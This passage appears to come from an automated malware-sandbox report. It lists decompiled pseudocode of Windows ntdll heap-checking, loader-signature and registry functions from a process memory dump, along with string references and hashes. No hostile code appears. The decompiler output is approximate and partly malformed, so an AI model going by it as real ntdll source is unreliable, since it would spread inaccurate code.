0x015e7f24
0x015e7f24
0x015e7f2c
0x0163996a
0x01639975
0x01639975
0x0163997e
0x01639993
0x01639993
0x0163997e
0x00000000
0x015e7ef2
0x015e7efc
0x015e7f0a
0x015e7f0e
0x01639933
0x00000000
0x01639933
0x00000000
0x015e7f0e
0x00000000
0x00000000
0x00000000
0x015e7eb1

Strings

LdrpCompleteMapModule, xrefs: 01639898
Could not validate the crypto signature for DLL %wZ, xrefs: 01639891
minkernel\ntdll\ldrmap.c, xrefs: 016398A2

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: d06564ab514ba928e102a13cd40e85c8fb6187cbf628571e2c00dd8ba9fefecc
Instruction ID: 759999f97ac4d4edce9b6b9456af411a1d2018f0d574aef95c9addb53690b6e3
Opcode Fuzzy Hash: d06564ab514ba928e102a13cd40e85c8fb6187cbf628571e2c00dd8ba9fefecc
Instruction Fuzzy Hash: 4B51DF31A007469FEB2ACB6CCD88B6A7BE5FB89314F040999E9519F3D1D770E900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 016823E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E016823E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x16c874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x16c874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0162D4F0(_t83, 0x15b6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E015DB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x16c6378 = 1;
						asm("int3");
						 *0x16c6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x016823e3
0x016823e8
0x016823eb
0x016823ee
0x016823f3
0x0168259b
0x0168259b
0x0168259d
0x016825a3
0x016825a3
0x016823fb
0x01682424
0x0168244f
0x01682460
0x01682451
0x01682451
0x01682456
0x01682458
0x01682458
0x0168245b
0x0168245b
0x01682426
0x01682431
0x01682436
0x01682443
0x01682438
0x01682438
0x01682438
0x01682445
0x01682445
0x01682463
0x01682469
0x0168246f
0x01682480
0x01682495
0x016824a1
0x016824ce
0x016824df
0x016824d0
0x016824d0
0x016824d5
0x016824d7
0x016824d7
0x016824da
0x016824da
0x016824a3
0x016824b0
0x016824b5
0x016824c2
0x016824b7
0x016824b7
0x016824b7
0x016824c4
0x016824c4
0x016824e8
0x01682497
0x0168249a
0x0168249a
0x01682482
0x01682488
0x01682488
0x01682471
0x01682479
0x01682479
0x016824ef
0x016823fd
0x01682401
0x01682412
0x01682403
0x01682403
0x01682408
0x0168240a
0x0168240a
0x0168240d
0x0168240d
0x0168241b
0x0168241b
0x016824f1
0x016824f6
0x01682507
0x01682510
0x00000000
0x01682510
0x0168250b
0x00000000
0x016824f8
0x016824f8
0x016824fc
0x01682500
0x01682512
0x01682515
0x0168251a
0x01682521
0x01682524
0x01682529
0x0168252f
0x00000000
0x00000000
0x0168253c
0x0168255c
0x01682561
0x0168253e
0x01682554
0x01682559
0x0168256a
0x0168256d
0x01682574
0x01682586
0x01682588
0x0168258f
0x01682590
0x01682590
0x01682597
0x00000000
0x01682597

Strings

HEAP[%wZ]: , xrefs: 0168254F
HEAP: , xrefs: 0168255C
Heap block at %p modified at %p past requested size of %Ix, xrefs: 0168256F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 7ab289ef0d9b08bab0c16ec20f0eff03ebdb794f690455eaba0bf21f8c101550
Instruction ID: 683adee5d746764fbc1f76381672062bc20658d35f5bc1c2ed0c10dd2d13fedf
Opcode Fuzzy Hash: 7ab289ef0d9b08bab0c16ec20f0eff03ebdb794f690455eaba0bf21f8c101550
Instruction Fuzzy Hash: 5C5112741012608AE374EF2ECCA47727BF1EB88644F154A9EE9C28B285D376D847DB71

Uniqueness

Uniqueness Score: -1.00%

Function 015DE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E015DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E015DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016195D0();
						}
						if(_t78 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0161FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0161BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01619600();
					if(_t97 < 0) {
						goto L6;
					}
					E0161BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L015DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0161BB40(_t83, _t102 + 0x24, _t78);
								if(L015E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0161BB40(_t84, _t102 + 0x24, _t94);
									if(L015E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x015de620
0x015de628
0x015de62f
0x015de631
0x015de635
0x015de637
0x015de63e
0x01635503
0x01635503
0x015de64c
0x015de64c
0x015de651
0x00000000
0x00000000
0x015de661
0x015de665
0x0163542a
0x015de715
0x015de71a
0x015de71c
0x015de720
0x015de720
0x015de727
0x015de736
0x015de736
0x015de743
0x015de743
0x015de673
0x015de678
0x015de67d
0x015de682
0x015de685
0x015de692
0x015de69b
0x015de6a3
0x015de6ad
0x015de6b1
0x015de6b2
0x015de6bb
0x015de6bf
0x015de6c0
0x015de6c8
0x015de6cc
0x015de6d5
0x015de6d9
0x00000000
0x00000000
0x015de6e5
0x015de6ea
0x015de6f9
0x015de70b
0x015de70f
0x01635439
0x0163545e
0x0163545e
0x00000000
0x0163545e
0x0163543b
0x0163543e
0x01635440
0x01635445
0x01635472
0x01635475
0x0163548d
0x01635493
0x016354a9
0x00000000
0x00000000
0x016354ab
0x016354b4
0x016354bc
0x016354c8
0x016354de
0x016354fb
0x016354e0
0x016354e6
0x016354eb
0x016354eb
0x016354de
0x00000000
0x016354bc
0x01635477
0x0163547a
0x01635480
0x01635483
0x01635486
0x0163548b
0x00000000
0x00000000
0x00000000
0x0163548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01635447
0x01635447
0x01635447
0x01635447
0x0163544e
0x00000000
0x00000000
0x01635450
0x01635452
0x01635455
0x0163545a
0x00000000
0x00000000
0x00000000
0x0163545c
0x0163546a
0x0163546d
0x0163546f
0x00000000
0x0163546f
0x015de70f

Strings

@, xrefs: 015DE6C0
InstallLanguageFallback, xrefs: 015DE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015DE68C

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 5782eb1270020eaa59ca7013a644f89bc7a747e144f90c627f6d5bda1b771eb6
Instruction ID: 1a6d0ebafc839eb84add5a32ed517b96814803fef219e81ae8a394452315fe4d
Opcode Fuzzy Hash: 5782eb1270020eaa59ca7013a644f89bc7a747e144f90c627f6d5bda1b771eb6
Instruction Fuzzy Hash: BC5170726053469BD724DF68C840A6BB7E8BF98714F45092EF98ADB241EB34D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 015FEB9A, Relevance: 3.9, Strings: 3, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E015FEB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t7 = _t127 - 8; // -8
					_t91 = _t7;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							E0168FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E015FBC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E015FE4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0x16c8748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E015DB150();
								__eflags =  *0x16c7bc8;
								if(__eflags == 0) {
									__eflags = 1;
									E01692073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}

0x015feb9a
0x015feba5
0x015feba7
0x015febaa
0x015febb3
0x015feca0
0x015feca1
0x015feca5
0x015fecd1
0x015fecd1
0x015fecaa
0x015fecc3
0x015fecc9
0x015fecc9
0x015febb9
0x015febbf
0x015febc2
0x015febc2
0x015febc2
0x015febc7
0x00000000
0x00000000
0x015febd1
0x015febd1
0x015febd4
0x015febd9
0x015febdd
0x015febe9
0x015febf0
0x01644258
0x0164425e
0x0164425e
0x015febf6
0x015febf6
0x015febf9
0x015febfc
0x015febfe
0x015fec01
0x015fec01
0x015fec04
0x00000000
0x00000000
0x015fec0a
0x015fec0e
0x015fec11
0x015fec14
0x015fec8f
0x015fec92
0x00000000
0x015fec92
0x015fec1a
0x015fec1d
0x015fec20
0x015fec72
0x015fec75
0x015fec77
0x015fec77
0x015fec78
0x015fec7a
0x015fec7a
0x015fec83
0x015fec83
0x015fec32
0x015fec3e
0x01644281
0x01644284
0x01644286
0x0164428c
0x01644290
0x016442af
0x016442b4
0x01644292
0x016442a7
0x016442ac
0x016442ba
0x016442bf
0x016442c4
0x016442cc
0x016442d0
0x016442d1
0x016442d1
0x016442cc
0x016442d6
0x016442d6
0x015fec44
0x015fec4b
0x015fec55
0x015fec5b
0x015fec5b
0x015fec5d
0x015fec60
0x00000000
0x015fec60
0x015fec8a
0x00000000
0x015fec8a
0x015fec71

Strings

HEAP[%wZ]: , xrefs: 016442A2
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 016442BA
HEAP: , xrefs: 016442AF

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: f9cc1a793d7728db0ee199910115a2e2adc85b122c295380ed9400cd0436e5da
Instruction ID: 3708f93de21dec6c67a41d674a0337cb775b002ef22bf69570f8512808deda16
Opcode Fuzzy Hash: f9cc1a793d7728db0ee199910115a2e2adc85b122c295380ed9400cd0436e5da
Instruction Fuzzy Hash: 3B51BC31A00516EFCB14DF69C885B6ABBF2FF85310F1681ADEA059F356D731A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015FB8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E015FB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x16c8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E015DB150();
						} else {
							E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E015DB150();
						__eflags =  *0x16c7bc8;
						if(__eflags == 0) {
							E01692073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E015FAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x015fb8f0
0x015fb8f2
0x015fb8f4
0x01642c4e
0x01642c50
0x01642c56
0x01642c5c
0x01642c60
0x01642c7f
0x01642c84
0x01642c62
0x01642c77
0x01642c7c
0x01642c8a
0x01642c8f
0x01642c94
0x01642c9c
0x01642ca5
0x01642ca5
0x01642c9c
0x01642c50
0x015fb8fa
0x015fb902
0x015fb921
0x015fb921
0x015fb924
0x015fb924
0x015fb927
0x00000000
0x00000000
0x015fb929
0x015fb92b
0x015fb92d
0x015fb940
0x00000000
0x015fb940
0x015fb932
0x015fb932
0x00000000
0x015fb932
0x00000000
0x015fb904
0x015fb904
0x015fb90a
0x015fb90c
0x015fb916
0x015fb919
0x015fb915
0x015fb915
0x015fb91b
0x015fb91b
0x00000000
0x015fb910

Strings

HEAP[%wZ]: , xrefs: 01642C72
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01642C8A
HEAP: , xrefs: 01642C7F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: eeea3b2c6bdea215fe1d70045ced0929c13b92c13fbf99f0f22a3aa65d1d08b4
Instruction ID: 7d1358b57b3175c0015dc27c57ac891a32a264d078e7d9403318d92d72d15ac8
Opcode Fuzzy Hash: eeea3b2c6bdea215fe1d70045ced0929c13b92c13fbf99f0f22a3aa65d1d08b4
Instruction Fuzzy Hash: A711D031304503DFDB29EB29C994B3AB7A6FF80A20F29852DE20ACF245D770D940C755

Uniqueness

Uniqueness Score: -1.00%

Function 0169E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0169E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0169BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0169BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0169AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01619730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0169A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0169A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0169A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0169A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E015F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E015EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E015EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E015F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0168FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0169e547
0x0169e549
0x0169e54f
0x0169e553
0x0169e557
0x0169e55a
0x0169e55c
0x0169e55f
0x0169e561
0x0169e567
0x0169e56b
0x0169e7e2
0x00000000
0x0169e571
0x0169e575
0x0169e577
0x0169e57b
0x0169e57c
0x0169e57d
0x0169e57e
0x0169e57f
0x0169e588
0x0169e58f
0x0169e591
0x0169e592
0x0169e592
0x0169e596
0x0169e59e
0x0169e5a0
0x0169e5a6
0x0169e61d
0x0169e61d
0x0169e621
0x0169e623
0x0169e630
0x0169e630
0x0169e7e6
0x0169e7eb
0x0169e7ed
0x0169e7f4
0x0169e7fa
0x0169e7ff
0x0169e7ff
0x0169e80a
0x0169e812
0x0169e812
0x0169e5ab
0x0169e5b4
